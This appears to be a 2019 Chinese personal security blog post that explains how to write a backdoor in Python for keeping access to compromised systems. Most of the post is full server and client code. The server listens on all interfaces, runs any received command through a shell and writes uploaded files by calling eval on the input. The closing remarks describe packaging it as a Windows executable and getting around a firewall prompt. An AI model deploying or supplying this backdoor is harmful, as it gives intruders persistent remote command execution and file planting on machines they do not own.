<!DOCTYPE html>
<html lang="zh-CN">










<head>
    <meta charset="utf-8" />
    <link rel="apple-touch-icon" sizes="76x76" href="/favicon.ico">
    <link rel="icon" type="image/png" href="/favicon.ico">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0, shrink-to-fit=no" name="viewport" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="description" content="One way to choose one">
    <meta name="author" content="Misaki">
    <meta name="keywords" content="">
    <title>利用python socket编写后门 ~ Misaki&#39;s Blog</title>
    
<link rel="stylesheet" href="/css/Material_Icons.css">

    <!-- 
<link rel="stylesheet" href="/css/font-awesome.css">
 -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/latest/css/font-awesome.min.css">
    
<link rel="stylesheet" href="/css/main.css">

    
        
<link rel="stylesheet" href="/css/post.css">

        
            
<link rel="stylesheet" href="/css/Prettify/tomorrow-night-eighties.min.css">

        
    
<meta name="generator" content="Hexo 5.4.2"></head>

<body class=" sidebar-collapse">
<nav class="navbar navbar-transparent navbar-color-on-scroll fixed-top navbar-expand-lg" color-on-scroll="100" id="sectionsNav">
    <div class="container">
        <div class="navbar-translate">
            <a class="navbar-brand" href="/">
                Misaki&#39;s Blog</a>
            <button class="navbar-toggler" type="button" data-toggle="collapse" aria-expanded="false" aria-label="Toggle navigation">
                <span class="sr-only">Toggle navigation</span>
                <span class="navbar-toggler-icon"></span>
                <span class="navbar-toggler-icon"></span>
                <span class="navbar-toggler-icon"></span>
            </button>
        </div>
            <div class="collapse navbar-collapse">
                <ul class="navbar-nav ml-auto">
                    
                        
                            <li class="nav-item">
                                <a class="nav-link" href="/archives/">
                                    archives
                                </a>
                            </li>
                        
                            <li class="nav-item">
                                <a class="nav-link" href="/about/">
                                    about
                                </a>
                            </li>
                        
                    
                    
                        
                            <li class="nav-item">
                                <a class="nav-link" rel="tooltip" title="" data-placement="bottom" href="https://github.com/MisakiKata" target="_blank" data-original-title="See me here">
                                    <i class="fa fa-github"></i>
                                </a>
                            </li>
                        
                            <li class="nav-item">
                                <a class="nav-link" rel="tooltip" title="" data-placement="bottom" href="https://www.t00ls.net/members-profile-12179.html" target="_blank" data-original-title="See me here">
                                    <i class="fa fa-twitch"></i>
                                </a>
                            </li>
                        
                            <li class="nav-item">
                                <a class="nav-link" rel="tooltip" title="" data-placement="bottom" href="https://misakikata.github.io/atom.xml" target="_blank" data-original-title="See me here">
                                    <i class="fa fa-rss"></i>
                                </a>
                            </li>
                        
                            <li class="nav-item">
                                <a class="nav-link" rel="tooltip" title="" data-placement="bottom" href="mailto:misakikatas@gmail.com" target="_blank" data-original-title="See me here">
                                    <i class="fa fa-envelope"></i>
                                </a>
                            </li>
                        
                            <li class="nav-item">
                                <a class="nav-link" rel="tooltip" title="" data-placement="bottom" href="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/img/2022/12/29/10-47-19-8d33d040e42d9f086a13827162cc246a-下载-17fdcb.png" target="_blank" data-original-title="See me here">
                                    <i class="fa fa-comments"></i>
                                </a>
                            </li>
                        
                    
                </ul>
            </div>
    </div>
</nav>
    
  <div class="page-header header-filter" data-parallax="true" style="background-image: url('/img/post-banner.jpg'); height: 70vh;">
    
      <div class="container">
        <h1 class="title text-center post_title">利用python socket编写后门</h1>
        <p class="text-center"><b>Saturday, February 2nd 2019, 11:00 am</b></p>
      </div>
    
  </div>

  
  
  
    <div class="row" style="margin: 0 0 0; z-index: 999;">
  <div class="col-md-8 offset-md-1">
    <div class="main main-raised">
      <div class="container">
        <div class="section">
          <div class="post_content">
              <p>在获取系统权限时候，一般想维持权限或者做端口转发的时候，会用一些端口转发的工具，例如nc，ew，lcx等。</p>
<p>但在这种类似后门的工具中被查杀率和存在后门的情况时有发生，本人就遇到过获取系统权限创建账号后，发现没多久又被植入其他隐藏账号的情况。</p>
<p>因此，既然会写一些代码就简单的来实现一个利用socket通信的后门脚本。</p>
<p>如下server端：</p>
<pre class="line-numbers language-none"><code class="language-none"># coding:utf-8

import socket
import subprocess

# server

def server_main(ips):
    server &#x3D; socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.bind((&quot;0.0.0.0&quot;, ips))
        server.listen(5)
        print &quot;[*] Listening on %s:%d&quot; %(socket.gethostname(),ips)
        while True:
            data, addr &#x3D; server.accept()
            buf &#x3D; data.recv(4096)
            print &quot;[*] recv command &#x3D; %s&quot; %buf
            if len(buf) !&#x3D; 0:
                if is_file(buf):
                    rev &#x3D; upload(buf)
                else:
                    rev &#x3D; run_command(buf)
            data.send(rev)
    except:
        print &quot;Exception!&quot;

def is_file(buf):
    try:
        if isinstance(eval(buf), dict):
            return True
    except:
        return False


def run_command(command):
    command &#x3D; command.strip()
    try:
        p &#x3D; subprocess.Popen(command, stdin&#x3D;subprocess.PIPE, stdout&#x3D;subprocess.PIPE, stderr&#x3D;subprocess.PIPE, shell&#x3D;True)
        out, err &#x3D; p.communicate()
    except:
        out &#x3D; &quot;Fail to execute command!&quot;
    return out


def upload(data):
    try:
        path &#x3D; eval(data)[&#39;path&#39;]
        file &#x3D; eval(data)[&#39;request&#39;]
        with open(path, &#39;wb&#39;) as f:
            f.write(file)
        return &quot;OK&quot;
    except:
        return &quot;Fail&quot;

if __name__ &#x3D;&#x3D; &quot;__main__&quot;:
    ip &#x3D; input(&quot;PORT &#x3D; &quot;)
    server_main(int(ip))
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>client端：</p>
<pre class="line-numbers language-none"><code class="language-none">#coding:utf-8

import socket

# client

# use:
# &gt;&gt; command   eg:&gt;&gt; whoami
# &gt;&gt; upload 要上传的源文件 要上传到的目标地址文件  &gt;&gt; upload d:&#x2F;a.txt e:&#x2F;a.txt

def client(ips, data):
    resp &#x3D; socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        resp.settimeout(10)
        resp.connect(ips)
        resp.send(data)
        out &#x3D; resp.recv(4096)
        resp.close()
    except :
        out &#x3D; &quot;Except Or Time out !&quot;
    return out

def client_send(target, port):
    while True:
        data &#x3D; raw_input(&quot;&gt;&gt; &quot;)
        if &#39;upload&#39; not in data:
            out &#x3D; client((target,port),data)
            print &quot;[*] Command Out&#x3D; %s&quot; % out
        else:
            upload((target,port),data)


def upload(ips,data):
    file &#x3D; data.split(&#39; &#39;)
    list_a &#x3D; &#123;&#125;
    name &#x3D; file[1].replace(&#39;\\&#39;,&#39;&#x2F;&#39;)
    list_a[&#39;path&#39;] &#x3D; file[2]
    request &#x3D; &#39;&#39;
    with open(name,&#39;rb&#39;) as f:
        for i in f.readlines():
            request+&#x3D;i
    list_a[&#39;request&#39;] &#x3D; request
    out &#x3D; client(ips, str(list_a))
    if &quot;OK&quot; in out:
        print &quot;[*] File Write Success !&quot;
    else:
        print &quot;[*] File Write Fail !&quot;

if __name__ &#x3D;&#x3D; &quot;__main__&quot;:
    ip &#x3D; raw_input(&quot;IP:PORT &#x3D; &quot;)
    list_a &#x3D; ip.split(&quot;:&quot;)
    client_send(list_a[0], int(list_a[1]))<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>代码实现简单，问题在执行的时候是一个正向连接，在服务器开放端口，所以在一定情况下，需要较高的权限。当然这也是后渗透中需要得到的目标。</p>
<p>同时可以利用pyinstaller打包为exe文件在win下运行，不过开放防火墙就需要添加网络允许，但本人尝试中发现，对防火墙端口添加的提示中直接关闭窗口提示，再次运行就可以正常使用。防火墙中也没有启用此运行规则。尚不清楚原因。</p>

          </div>
          <br><br>
              
                <div class="license-wrapper">
                    <p>原文作者：<a href="https://misakikata.github.io">Misaki</a>
                    <p>原文链接：<a href="https://misakikata.github.io/2019/02/%E5%88%A9%E7%94%A8python-socket%E7%BC%96%E5%86%99%E5%90%8E%E9%97%A8/">https://misakikata.github.io/2019/02/%E5%88%A9%E7%94%A8python-socket%E7%BC%96%E5%86%99%E5%90%8E%E9%97%A8/</a>
                    <p>发表日期：<a href="https://misakikata.github.io/2019/02/%E5%88%A9%E7%94%A8python-socket%E7%BC%96%E5%86%99%E5%90%8E%E9%97%A8/">February 2nd 2019, 11:00:50 am</a>
                    <p>更新日期：<a href="https://misakikata.github.io/2019/02/%E5%88%A9%E7%94%A8python-socket%E7%BC%96%E5%86%99%E5%90%8E%E9%97%A8/">February 1st 2019, 11:51:10 am</a>
                    <p>版权声明：本文采用<a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
                </div>
              
          <br><br>
          <div>
              <p>
                       
                      <span class="badge badge-default">#&nbsp;python</span>
                      &nbsp;
                      
              </p>
          </div>
        </div>
      </div>  
    </div>
  </div>
  <!-- TOC -->
  
      <div class="">
        <div id="toc">
          <p class="toc-title"><i class="material-icons" style="vertical-align:middle">toc</i>Toc:</p> 
          <div id="tocbot"></div>
        </div>
      </div>
  
</div>


<!-- Comments -->
<div class="row">
    <div class="col-md-8 offset-md-2">
    
        
            <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    <script>               
        var disqus_shortname = '';
        var disqus_config = function () {
            this.page.url = 'https://misakikata.github.io/2019/02/利用python-socket编写后门/'; 
            this.page.identifier = '/2019/02/利用python-socket编写后门/';
        };
        (function() { 
            var d = document, s = d.createElement('script');
            s.type = 'text/javascript';
            s.src = '//'+disqus_shortname+'.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        })();
    </script>
    <noscript>Please enable JavaScript to view the <a target="_blank" rel="noopener" href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>                                
</div>
        
    
    </div>
</div>
  

<footer class="footer footer-default">
        <div class="container">
          <div class="float-left" style="padding: 15px 0;">
              <b>假如今天的你被生活辜负了，别伤心，因为明天生活还会继续辜负你！</b>
          </div>
          <div align="right" style="padding: 15px 0;">
              <i class="iconfont icon-love" ></i>
              <a href="https://github.com/0x2e/Material-T" target="_blank"> <b>Material-T</b></a>
          </div>
        </div>
</footer>
      <!--   Core JS Files   -->
      
<script src="/js/core/jquery.min.js?v=3.2.1.js"></script>

      
<script src="/js/main.js"></script>

      
<script src="/js/core/popper.min.js"></script>

      
<script src="/js/core/bootstrap-material-design.min.js"></script>

      
<script src="/js/plugins/moment.min.js"></script>

      
<script src="/js/material-kit.min.js?v=2.0.5.js"></script>

      
        <script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
        
<script src="/js/post.js"></script>

        
<script src="/js/plugins/prettify.js"></script>

        <script>
            $(document).ready(function(){
                $('pre').addClass('prettyprint linenums');
                prettyPrint();
            })
        </script>
      
<script src="/live2d-widget/autoload.js"></script>
</body>
</html>